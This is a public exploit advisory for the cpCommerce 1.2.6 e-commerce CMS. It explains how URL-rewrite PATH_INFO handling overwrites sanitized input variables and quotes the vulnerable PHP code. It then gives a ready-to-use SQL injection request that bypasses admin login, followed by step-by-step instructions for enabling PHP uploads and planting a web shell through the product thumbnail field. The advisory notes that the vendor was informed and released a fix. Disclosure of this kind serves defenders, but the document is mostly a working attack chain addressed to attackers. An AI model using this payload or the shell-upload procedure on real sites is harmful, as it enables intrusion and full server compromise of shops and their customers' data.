cpCommerce 1.2.6 (URL Rewrite) Input variable overwrite - Auth bypass PoC
2008-11-30 01:00:08Author: girex
Homepage: girex.altervista.org
CMS: cpCommerce 1.2.6
Site: http://cpcommerce.cpradio.org/
Bug: URL Rewrite -> Input variables overwrite
PoC: Auth bypass -> Shell upload
Note: Works regardless php.ini settings
Vendor informed: 23/11/08
cpCommerce 1.2.7 released: 30/11/08
Public advisory: 30/11/08
-------------------------------------------------------------------------------------------------
CMS Description: cpCommerce is an open-source e-commerce solution that is maintained by templates and modules.
-------------------------------------------------------------------------------------------------
Vulnerability discussion:
cpCommerce sets register_globals to Off with ini_set
and stores all GET and POST variables into $input array after have addslashed them.
lines: 16-32
file: /functions/sanitize_value.func.php
function SanitizeInput()
{
$input = array();
if (isset($_GET) && sizeof($_GET) > 0 && is_array($_GET))
{
foreach ($_GET as $key => $val)
{
if (is_array($val))
{
$input[$key] = SanitizeArray($val);
}
else
{
$input[$key] = SanitizeValue($val);
}
}
}
... and does the same for POST vars
lines: 3-13
function SanitizeValue($value)
{
if (!get_magic_quotes_gpc())
{
return addslashes(preg_replace("/(\.\.)/i", "", htmlentities($value, ENT_QUOTES)));
}
else
{
return preg_replace("/(\.\.)/i", "", htmlentities($value, ENT_QUOTES));
}
}
-------------------------------------------------------------------------------------------------
Let we see _funcions.php (the mainfile)
lines: 128-132
file: _functions.php
$input = array();
if ((isset($_GET) && sizeof($_GET) > 0) || (isset($_POST) && sizeof($_POST) > 0))
{
$input = SanitizeInput();
}
So, all GET and POST vars ar sanitized and stored into $input array.
Let we procede in _functions.php...
-------------------------------------------------------------------------------------------------
lines 156-173
file: _functions.php
if (isset($_SERVER['PATH_INFO']) && strlen($_SERVER['PATH_INFO']) != 0)
{
$rewriteValues = array();
if (strrpos($_SERVER['PATH_INFO'], '/') == strlen($_SERVER['PATH_INFO']) - 1)
{
$rewriteValues = split('/', substr($_SERVER['PATH_INFO'], 1, strlen($_SERVER['PATH_INFO']) - 2));
}
else
{
$rewriteValues = split('/', substr($_SERVER['PATH_INFO'], 1, strlen($_SERVER['PATH_INFO']) - 1));
}
for ($i = 0; $i < sizeof($rewriteValues); $i += 2)
{
$input[$rewriteValues[$i]] = $rewriteValues[$i + 1];
}
}
$_SERVER['PATH_INFO'] is a SERVER var that contains the request url after the request page
For example: GET http://localhost/index.php/helloword
/index.php is the page requested and $_SERVER['PATH_INFO'] contains /helloword
As you can see from previous snipplet of code we can set $input content with
GET index.php/key/value/
So we can overwrite all inputs data in this cms, bypassing SanitazeInput()
and the effect of magic_quotes
How we'll exploit that....
-------------------------------------------------------------------------------------------------
lines: 13-20
code: /actions/login.act.php
if (checkSession($input['email'], md5($input['password']))) {
$_SESSION['cpTemplate'] = $_SESSION['cpInfo']['template'];
$return['url'] = urldecode("{$input['returnurl']}");
} else {
$_SESSION['loginerror'] = TRUE;
$return['url'] = urldecode("{$input['returnurl']}");
}
If checkSession returns true we are logged in...
lines: 3-9
code: /functions/account_info.func.php
function checkSession($email,$pass) {
global $config, $db_chooser;
$sql['accounts'] = "select `id_account`, `level` from " . $db_chooser->Accounts() . " where " .
"email='$email' and pass='$pass'";
$accounts = $db_chooser->sql_query($sql['accounts']);
We can manipulate this query having a SQL Injection with an auth bypass
logging in with admin priviledges...
-------------------------------------------------------------------------------------------------
If we set $input['email'] to: ' OR id_account=1# with the trick of PATH_INFO (index.php/email/value)
the resulting query will be: select `id_account`, `level` from cpAccounts where email='' OR id_account=1
-------------------------------------------------------------------------------------------------
PoC Auth Bypass:
GET http://[host]/[path]/index.php/email/%27%20OR%20id_account=1%23/?action=login&submit=Login&returnurl=index.php
-------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------
If you want to upload a shell:
- Log in with the auth bypass PoC
- Go to /[path]/admin/
- Go to General Info -> Configuration
- Add ,php in What Image Extensions do you want to accept on Uploads?
- Go to Product -> Create
- Select a right category
- Fill required fields
- Upload your shell.php in Product Thumbnail Image
- Save all
Your shell wil be at /[path]/images/products/thumbnails/[name_of_shell]_[product_id].php
-------------------------------------------------------------------------------------------------
#
Fixes
No fixesIn order to submit a new fix you need to be registered.